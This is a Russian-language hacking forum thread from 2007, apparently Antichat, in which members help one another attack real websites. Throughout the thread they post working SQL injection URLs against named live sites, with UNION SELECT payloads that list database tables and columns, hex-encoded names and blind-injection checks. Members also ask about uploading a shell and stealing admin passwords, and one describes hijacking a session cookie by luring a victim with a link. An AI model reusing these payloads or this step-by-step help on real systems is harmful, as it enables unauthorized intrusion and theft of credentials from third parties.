Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. YaNeLam

    YaNeLam Member

    Joined:
    23 Oct 2007
    Messages:
    23
    Likes Received:
    19
    Reputations:
    -10
    а Как
    Вот в куках есть
    Member_id:это я нашол
    Pass_hash:а суда чито ставить?*
     
    1 person likes this.
  2. Roba

    Roba Banned

    Joined:
    24 Oct 2007
    Messages:
    237
    Likes Received:
    299
    Reputations:
    165
    А как сам думаешь? Вот ты нашел в данных с сниффера Pass_hash ??? Ответ напрашивается...человек в данный момент не авторизован на форуме.
    Подскажите с инъектом,я ток начал пробовать..
    Code:
    http://www.linuxmint.com/mirrors.php?id=-1+union+select+1,2,TABLE_NAME,4,5,6+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='admin'+LIMIT+1,1+--+
    Я так понял, что фильтруется кавычка, как можно это сделать иначе ?
     
    #282 Roba, 8 Nov 2007
    Last edited: 8 Nov 2007
  3. YaNeLam

    YaNeLam Member

    Joined:
    23 Oct 2007
    Messages:
    23
    Likes Received:
    19
    Reputations:
    -10
    Авторизирован.
    Я ему отослал на форуме лс:
    Привет.Зайди,скачай пак анекдотов.
    Он зашел и все....
    ОН АВТОРИЗИРОВАН.
     
  4. delay(0)

    delay(0) Member

    Joined:
    22 Nov 2006
    Messages:
    90
    Likes Received:
    41
    Reputations:
    6
    zamut,
    Where+table_name=название в хексе
    Where+table_name=название в чаре
     
  5. Roba

    Roba Banned

    Joined:
    24 Oct 2007
    Messages:
    237
    Likes Received:
    299
    Reputations:
    165
    2delay(0)
    спс, сейчас попробую..
     
  6. VentRu

    VentRu New Member

    Joined:
    27 Sep 2007
    Messages:
    11
    Likes Received:
    1
    Reputations:
    0
    извиняюсь, версию недоглядел..автор, наверно, допустил опечатку
    http://www.linuxmint.com/mirrors.php?id=-1+union+select+1,2,COLUMN_NAME,4,5,6+FROM+INFORMATI ON_SCHEMA.COLUMNS+WHERE+COLUMN_NAME='admin'+LIMIT+1 ,1+--+
     
    #286 VentRu, 8 Nov 2007
    Last edited: 8 Nov 2007
  7. SVAROG

    SVAROG Elder - Старейшина

    Joined:
    13 Feb 2007
    Messages:
    424
    Likes Received:
    86
    Reputations:
    -1
    http://sc-ufa.uraltb.ru/?id=4+UNION+SELECT+1,2,3+LIMIT+1,1/*
    можно ли сюда шелл залить или пароль получить от админки? или от БД
     
  8. ENFIX

    ENFIX Elder - Старейшина

    Joined:
    6 Jun 2006
    Messages:
    175
    Likes Received:
    122
    Reputations:
    75
    Шелл не зальешь. Файл прив выключен, есть экранирование кавычек.
    Прав на чтение mysql.user нет

    Версия мускула 5, можно узнать имена таблиц и столбцов
    Code:
    http://sc-ufa.uraltb.ru/?id=4+and+1=0+UNION+SELECT+1,table_name,3+from+INFORMATION_SCHEMA.tables+limit+16,1/*
    вот например таблица _a3access
    Code:
    http://sc-ufa.uraltb.ru/?id=4+and+1=0+UNION+SELECT+1,table_name,3+from+INFORMATION_SCHEMA.tables+limit+16,1/*
    
    Для просмотра меняшь limit.
    вот пример просмотра столбцов в этой же таблице
    Code:
    http://sc-ufa.uraltb.ru/?id=4+and+1=0+UNION+SELECT+1,column_name,3+from+INFORMATION_SCHEMA.columns+where+table_name=0x5F6133616363657373+limit+0,1/*
    
    Для просмотра других столбцов также меняешь лимит
     
  9. SVAROG

    SVAROG Elder - Старейшина

    Joined:
    13 Feb 2007
    Messages:
    424
    Likes Received:
    86
    Reputations:
    -1
    ещё вопрос, как изменять данные которые находяться в столбцах
     
  10. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    При помощи MySql инъекции в конструкции select никак, потому что нет возможности использовать разделитель ";"
     
  11. Derec

    Derec Elder - Старейшина

    Joined:
    8 Nov 2007
    Messages:
    74
    Likes Received:
    4
    Reputations:
    0
    Подскажите: на сайте сделал так: https://www.server.ru/dir/index.php?do=viewinforum&cid=0&p=-1
    На странице выпала стесно оштбочка следующего содержания:
    Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home/dist/html/include/gen/forum.php on line 110
    Вопрос: это и есть SQL-injection? Если да, то какие действия далее?(+union+select+nul-- ничего не дает, даже это: +union+select+@@version+)
     
    #291 Derec, 10 Nov 2007
    Last edited: 10 Nov 2007
  12. phol1eadeux

    phol1eadeux Elder - Старейшина

    Joined:
    7 Aug 2007
    Messages:
    108
    Likes Received:
    48
    Reputations:
    -1
    В двух словах не рассказать. Ищи основы проведения инъекций.
    Либо можешь просмотреть сразу примеры:
    http://forum.antichat.ru/thread21336.html
     
  13. Roba

    Roba Banned

    Joined:
    24 Oct 2007
    Messages:
    237
    Likes Received:
    299
    Reputations:
    165
    Для начала, неплохо бы обратиться к статьям, их ведь не от нечего делать писали.
    http://forum.antichat.ru/thread43966.html
     
  14. Derec

    Derec Elder - Старейшина

    Joined:
    8 Nov 2007
    Messages:
    74
    Likes Received:
    4
    Reputations:
    0
    Ну тогда хотя бы скажите это Sql инъекция или липа?
     
  15. Dr.Z3r0

    Dr.Z3r0 Leaders of the World

    Joined:
    6 Jul 2007
    Messages:
    284
    Likes Received:
    595
    Reputations:
    567
    Ну надо полагать что да... Хотя ссылку бы кинул, глянул может...
     
    #295 Dr.Z3r0, 12 Nov 2007
    Last edited: 12 Nov 2007
  16. halkfild

    halkfild Members of Antichat

    Joined:
    11 Nov 2005
    Messages:
    365
    Likes Received:
    578
    Reputations:
    313
    сначала проверь саму sql-inj

    данные выведутся
    не выведутся

    потом подбери количество столбцов

    ну а потом проверь версию и тд
    все можно вывести в одном столбце CONCAT_WS(0x3A,VERSION(),USER(),DATABASE())

    з.ы. если не пройдут юнионы проверь через условие версию and+(ascii(substring(VERSION(),1,1))=51)
    з.з.ы вместо [что-то] надо подставить данные
    з.з.з.ы. это не алгоритм а лишь один из вариантов дальнейших действий
     
    _________________________
  17. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    да и вобще, это MySQL, а не MSSql который та пытаешься пользовать, даже в сообщении об ошибках это видно
     
  18. Derec

    Derec Elder - Старейшина

    Joined:
    8 Nov 2007
    Messages:
    74
    Likes Received:
    4
    Reputations:
    0
    halkfild, даже при этом данные выводятся :( Блин, да что ж такое!
    Дело такое: ссылку дать не могу, поскольку использую для входа свой логин и пароль. Это типа мини-форум, на котором меня круто #@!&, написали от моего лица не совсем приличное! Единственный выход проникнуть в базу, узнать пароли. Сам я MySQL не знаю (только MSSQL :rolleyes: ). halkfild, посоветуй, что нибудь ещё, очень прошу!
     
  19. Dr.Z3r0

    Dr.Z3r0 Leaders of the World

    Joined:
    6 Jul 2007
    Messages:
    284
    Likes Received:
    595
    Reputations:
    567
    Понимаешь в чем беда, тут вариантов масса...
    Кстати попробуй закрыть кавычкой [реальный индекс]...
    Или кинь ссылку тогда в личку чтоле если так боишся выкладывать...
    PS это не "единственный выход" еще как вариант набить морду тому кто это сделал :))
     
  20. phol1eadeux

    phol1eadeux Elder - Старейшина

    Joined:
    7 Aug 2007
    Messages:
    108
    Likes Received:
    48
    Reputations:
    -1
    Да он давал уже ссылку. Вроде там ниче не сделать
     
Thread Status:
Not open for further replies.